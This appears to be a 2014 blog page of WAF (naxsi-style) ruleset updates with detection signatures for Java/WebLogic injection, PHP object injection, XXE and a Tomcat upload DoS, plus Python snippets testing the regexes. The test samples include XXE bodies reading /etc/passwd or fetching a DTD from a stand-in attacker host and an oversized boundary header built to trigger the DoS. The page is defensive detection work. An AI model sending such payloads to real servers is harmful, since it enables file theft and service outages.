3      42000043   DN SCAN WhatWeb Web Application Fingerprint Scanner Default User-Agent Detected
3      42000073   DN SCAN Python-urllib UA, possible Scanner
3      42000127   DN SCAN Scanner Amiga-Aweb
3      42000151   DN SCAN Scanner whatweb
2      1005       mysql keyword (|)
2      1101       https:// scheme
2      42000053   DN WEB_SERVER GIT_Repo-Access
2      42000079   DN WEB_SERVER VTI_RPC - Access
2      42000080   DN WEB_SERVER Apache ServerStatus - Access
2      42000145   DN SCAN Scanner morfeus
2      42000265   DN WEB_SERVER Plesk Apache Zeroday Remote Exploit - possible scan
2      42000306   DN SCAN Morfeus - F*cking-Scanner
1      1400       utf7/8 encoding
1      42000031   DN SCAN Muieblackcat scanner
1      42000032   DN WEB_SERVER PHP-EVAL - Attempt
1      42000049   DN WEB_SERVER PHP_SYSTEM_CMD
1      42000226   DN SCAN Scanner WITOOL SQL Injection Scan 



Thursday, 3 April 2014

Ruleset-Update: 30 critical Java / Oracle Cloud vulns published by Adam Gowdiak

CAUTION: these rules are untested, since we don't run any WebLogic server or Oracle cloud services, and they might break stuff. Please test carefully before deploying.

Adam Gowdiak published 30+ critical vulns and PoCs against Oracle's Java Cloud and WebLogic server; see http://www.security-explorations.com/en/about.html

After a short skim through the exploit code I came up with some rules that might detect some of the malicious access attempts.


[+] new sigs:
  42000346 :: app_server.rules     :: Possible Java-Beans-Injection
  42000347 :: web_apps.rules       :: Possible Wordpress-Plugin-Backdoor detected
  42000348 :: app_server.rules     :: Possible Java.Lang - Injection (URL-Args & POST-Body)
  42000349 :: app_server.rules     :: Possible JAR-File Upload
  42000350 :: app_server.rules     :: Possible WAR - File Upload
  42000351 :: app_server.rules     :: Possible JSP - File Upload
  42000352 :: app_server.rules     :: Properties-File Access / Upload
  42000353 :: app_server.rules     :: Content-Type x-java-serialized-object
  42000354 :: app_server.rules     :: WebLogicServer wls_deployment_internal - Access
  42000355 :: app_server.rules     :: WebLogicServer wls_internal - Access



#
# sid: 42000355 | date: 2014-04-03 - 23:00 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:wls_internal/" "msg:WebLogicServer wls_internal - Access" "mz:URL" "s:$UWA:8" id:42000355  ;
      
       
#
# sid: 42000354 | date: 2014-04-03 - 22:59 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:wls_deployment_internal/" "msg:WebLogicServer wls_deployment_internal - Access" "mz:URL" "s:$UWA:8" id:42000354  ;
      
       
#
# sid: 42000353 | date: 2014-04-03 - 22:58 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:x-java-serialized-object" "msg:Content-Type x-java-serialized-object" "mz:$HEADERS_VAR:Content-Type" "s:$UWA:8" id:42000353  ;
      
       
#
# sid: 42000352 | date: 2014-04-03 - 22:54 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:.properties" "msg:Properties-File Access / Upload" "mz:URL|FILE_EXT" "s:$UWA:8" id:42000352  ;
      
       
#
# sid: 42000351 | date: 2014-04-03 - 22:51 
#
# http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:.jsp" "msg:Possible JSP - File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000351  ;
      
       
#
# sid: 42000350 | date: 2014-04-03 - 22:41 
#
# 
#
MainRule "str:.war" "msg:Possible WAR - File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000350  ;
      
       
#
# sid: 42000349 | date: 2014-04-03 - 22:42 
#
# 
#
MainRule "str:.jar" "msg:Possible JAR-File Upload" "mz:FILE_EXT" "s:$UWA:8" id:42000349  ;
      
       
#
# sid: 42000348 | date: 2014-04-03 - 21:57 
#
# phew! http://www.security-explorations.com/en/SE-2013-01-press2.html
#
MainRule "str:java.lang." "msg:Possible Java.Lang - Injection (URL-Args & POST-Body)" "mz:BODY|ARGS" "s:$UWA:8" id:42000348  ;
      
       
#
# sid: 42000346 | date: 2014-03-20 - 19:44 
#
# http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
# ref - sid: 42000286
#
MainRule "str:java.beans.eventhandler" "msg:Possible Java-Beans-Injection" "mz:BODY|ARGS" "s:$UWA:8" id:42000346  ;
      

Tuesday, 18 March 2014

Ruleset-Update: PHP Object Injection - Rule and some Spam-Rules

#
# sid: 42000343 | date: 2014-03-18 - 22:41 
#
# multiple vulns found lately 
# http://karmainsecurity.com/analysis-of-the-joomla-php-object-injection-vulnerability
# https://www.mare-system.de/news/secbulletin/1392018237/
# http://vagosec.org/2013/09/wordpress-php-object-injection/
# http://blog.sucuri.net/2014/03/security-exploit-patched-on-vbulletin-php-object-injection.html
# http://www.php.net/manual/de/function.serialize.php
#
MainRule "rx:O:\d+:.*:\d+:{(s|S):\d+:.*;.*}" "msg:possible PHP Object Injection" "mz:BODY|ARGS|HEADERS" "s:$ATTACK:8" id:42000343  ;
      
(EDIT 2015-12-14 - included HEADERS in MZ, see http://blog.dorvakt.org/2015/12/ruleset-update-jenkins-exploits-joomla.html )


#
# sid: 42000344 | date: 2014-03-18 - 13:49 
#
# http://www.heise.de/security/meldung/Hunderte-Typo3-Webseiten-gehackt-2148372.html
#
MainRule "str:casino" "msg:Possible Casino-Spam  (casino in URL)" "mz:URL" "s:$UWA:8" id:42000344  ;
      
       

#
# sid: 42000345 | date: 2014-03-18 - 13:50 
#
# 
#
MainRule "str:roulette" "msg:Possible Casino-Spam  (roulette in URL)" "mz:URL" "s:$UWA:8" id:42000345  ;
      
       

Sunday, 16 February 2014

Ruleset-Update: Tomcat/Apache-Commons File Upload DOS Attempt CVE-2014-0050

#
# sid: 42000342 |  date: 2014-02-16 - 00:54:09 | maker: lazydog
# 
# http://mail-archives.apache.org/mod_mbox/www-announce/201402.mbox/%3C52F373FC.9030907@apache.org%3E
# http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html
 

MainRule "rx:multipart\/form-data;(\s*)boundary=[a-zA-Z0-9_-]{4000}" "msg:DN APP_SERVER Tomcat/Apache-Commons File Upload DOS Attempt" "mz:$HEADERS_VAR:Content-Type" "s:$ATTACK:8" id:42000342 ;  

---------------- P.S.: Trustwave suggests the following ModSecurity rule (header fragment only; add your own id/phase/action):
SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}"
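As an added comparison (not from the post, the doxi repo or Trustwave), the two rules above run against constructed Content-Type headers. The doxi regex requires `boundary=` to follow `multipart/form-data;` immediately and the boundary to be unquoted, but the receiving parser reads the `boundary` parameter by name, so a `charset=` placed first or a quoted value still reaches the vulnerable code while missing the sig; the Trustwave length check is blind to that but also fires on any long header. A third pattern, mine, keys on the boundary value exceeding the 70-character limit RFC 2046 imposes on it, regardless of parameter order or quoting.

```python
import re

# doxi sig 42000342 as published
DOXI_RX = re.compile(
    r"multipart/form-data;(\s*)boundary=[a-zA-Z0-9_-]{4000}", re.IGNORECASE)

# Trustwave's length check: any 4000-byte run in the header
TRUSTWAVE_RX = re.compile(r".{4000}")

# Hardened variant (mine, not from the post): locate the boundary parameter
# wherever it sits, tolerate quoting, and flag a value longer than the
# 70 characters RFC 2046 allows.
HARDENED_RX = re.compile(
    r'multipart/form-data.*?boundary="?[^";\s]{71,}', re.IGNORECASE)

LONG = "A" * 4100   # long enough to overrun the 4 KiB parser buffer

# Constructed headers (not captured traffic)
SAMPLES = {
    "plain":   "multipart/form-data; boundary=" + LONG,
    "charset": "multipart/form-data; charset=utf-8; boundary=" + LONG,
    "quoted":  'multipart/form-data; boundary="' + LONG + '"',
    "normal":  "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
}


def classify(content_type):
    """(doxi, trustwave, hardened) verdicts for one header value."""
    return (DOXI_RX.search(content_type) is not None,
            TRUSTWAVE_RX.search(content_type) is not None,
            HARDENED_RX.search(content_type) is not None)


def evaluate(samples=SAMPLES):
    return {name: classify(value) for name, value in samples.items()}


if __name__ == "__main__":
    for name, verdict in evaluate().items():
        print(f"{name:8s} doxi={verdict[0]} trustwave={verdict[1]} hardened={verdict[2]}")
```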

Thursday, 30 January 2014

Ruleset-Update: XXE-Vuln and Websocket-Upgrade-Detection

Ruleset Download



Thanks to sensepost.com for fast support, for helping to understand the vulnerability and for providing additional information for signature creation. Remarks: we'll probably see more of this later, since the vulnerability will affect many more systems that use PHP + XML parsing; RCE'ing like it's Rails time again. The vulnerability description from sensepost.com and the blog post by R. Silva are worth a read.
#
#
# sid: 42000341 |  date: 2014-01-31 - 00:21:19 | maker: lazydog
# 
# credits: 
# - sensepost.com for a nice generic vuln- analysis 
#   http://sensepost.com/blog/10178.html
# - Reginaldo Silva for his blogpost about a server facebook-vuln
#   http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
# 
#  
# 
# 
 
MainRule "rx:<!ENTITY(.*)SYSTEM" "msg:DN WEB_SERVER possible XML/XXE-Exploitation attempt" "mz:BODY" "s:$UWA:8" id:42000341 ;
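As an added example (not from the post or the doxi repo), the XXE sig run against constructed XML bodies. In PCRE `.` does not cross a newline unless a dotall flag is set; whether naxsi sets one is an assumption here, and the Python default (no DOTALL) is used to show the consequence: a DTD that puts `SYSTEM` on the next line, which XML permits, is not matched. The hardened pattern is mine: it uses `\s+` instead of `.*`, accepts parameter entities (`<!ENTITY % name SYSTEM`) and also flags `PUBLIC` external entities, while still ignoring internal entities with an inline value.

```python
import re

# Sig 42000341 as published; naxsi rx: is case-insensitive. Python's
# default, like PCRE's, stops '.' at a newline (assumed to match naxsi).
PAGE_RX = re.compile(r"<!ENTITY(.*)SYSTEM", re.IGNORECASE)

# Hardened variant (mine): whitespace-tolerant, covers parameter entities
# and PUBLIC external identifiers, ignores internal entities.
HARDENED_RX = re.compile(
    r"<!ENTITY\s+(%\s*)?[\w.:-]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)

# Constructed XML bodies (not captured traffic)
SAMPLES = {
    "classic":
        '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>',
    "newline":
        '<!DOCTYPE r [<!ENTITY xxe\n  SYSTEM "file:///etc/passwd">]><r>&xxe;</r>',
    "parameter":
        '<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://attacker.test/x.dtd"> %dtd;]><r/>',
    "public":
        '<!DOCTYPE r [<!ENTITY xxe PUBLIC "-//x" "file:///etc/passwd">]><r>&xxe;</r>',
    "internal_only":
        '<!DOCTYPE r [<!ENTITY greeting "hello">]><r>&greeting;</r>',
}


def page_hits(samples=SAMPLES):
    return {k: PAGE_RX.search(v) is not None for k, v in samples.items()}


def hardened_hits(samples=SAMPLES):
    return {k: HARDENED_RX.search(v) is not None for k, v in samples.items()}


if __name__ == "__main__":
    for name in SAMPLES:
        print(f"{name:14s} page={page_hits()[name]} hardened={hardened_hits()[name]}")
```

The `internal_only` row matters for the false-positive budget: an entity with an inline literal value cannot reach the filesystem or the network, so neither pattern should fire on it.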


-----------------------------------------------

tl;dr: after checking out the security state of websockets: DON'T WANT (atm)

#
# sid: 42000340 |  date: 2014-01-31 - 00:21:47 | maker: lazydog
# 
# Attempt to connect to a Websocket
 
MainRule "str:upgrade" "msg:DN APP_SERVER Websocket-Connection-Scan" "mz:$HEADERS_VAR:Connection" "s:$UWA:8" id:42000340 ;